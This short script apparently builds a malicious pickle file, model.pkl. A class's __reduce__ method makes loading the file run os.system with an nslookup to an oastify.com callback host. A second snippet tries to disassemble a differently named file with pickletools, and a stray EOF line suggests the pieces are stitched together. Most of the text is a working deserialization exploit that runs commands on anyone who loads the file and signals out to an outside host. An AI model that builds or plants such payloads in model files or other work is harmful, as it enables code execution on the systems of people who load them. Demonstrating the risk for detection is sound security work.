establishment22.py

import pickle, os
class RCE:
    def __reduce__(self):
        return (os.system, ("nslookup xz054hepzk0utdgyzi52qum71y7svjj8.oastify.com",))

pickle.dump(RCE(), open("model.pkl","wb"))
EOF

python - << 'EOF'
import pickletools

print("Pickle opcodes detected:")
pickletools.dis("unsafe_pickle_model.pt")
EOF